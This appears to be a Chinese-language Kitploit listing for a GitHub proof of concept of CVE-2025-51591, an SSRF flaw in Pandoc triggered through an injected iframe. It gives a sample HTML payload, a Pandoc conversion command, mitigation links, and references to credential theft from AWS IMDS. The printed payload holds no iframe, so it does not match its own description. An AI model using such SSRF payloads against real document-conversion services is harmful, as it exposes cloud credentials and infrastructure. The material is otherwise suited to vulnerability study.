Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-51591-Pandoc-SSRF-POC — CVE-2025-51591 Pandoc SSRF 漏洞概念验证 | Kitploit
工具/GitHubGitHub/malayke/cve-2025-51591-pandoc-ssrf-poc
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubmalayke/cve-2025-51591-pandoc-ssrf-poc

CVE-2025-51591-Pandoc-SSRF-POC

CVE-2025-51591 Pandoc SSRF 漏洞概念验证

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
1110个月前尚未审核
分享

CVE-2025-51591 Pandoc SSRF 概念验证

image

JGM Pandoc v3.6.4 中存在服务器端请求伪造(SSRF)漏洞,攻击者可通过注入精心构造的 iframe 来获取访问权限并入侵整个基础设施。

安装 Pandoc

  • https://pandoc.org/installing.html

载荷示例

⚠️ 请将 iframe 的 URL 替换为你自己的 OAST URL。⚠️

root@kitploit:~
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CVE-2025-51591 Proof Of Concept</title>
</head>

<body>
    <h1>
        CVE-2025-51591 Proof Of Concept
    </h1>
    
</body>

</html>

使用 Pandoc 将载荷转换为 PDF

root@kitploit:~
pandoc payload.html -o output1.pdf
image

缓解策略

  • https://github.com/jgm/pandoc/issues/10682#issuecomment-2718343529
  • https://pandoc.org/MANUAL.html#a-note-on-security

参考

  • 黑客利用 Pandoc CVE-2025-51591 攻击 AWS IMDS 并窃取 EC2 IAM 凭据
  • IMDS 滥用:通过追踪罕见行为发现漏洞利用
  • 从用户控制的 HTML 生成 PDF 时的 SSRF
下载工具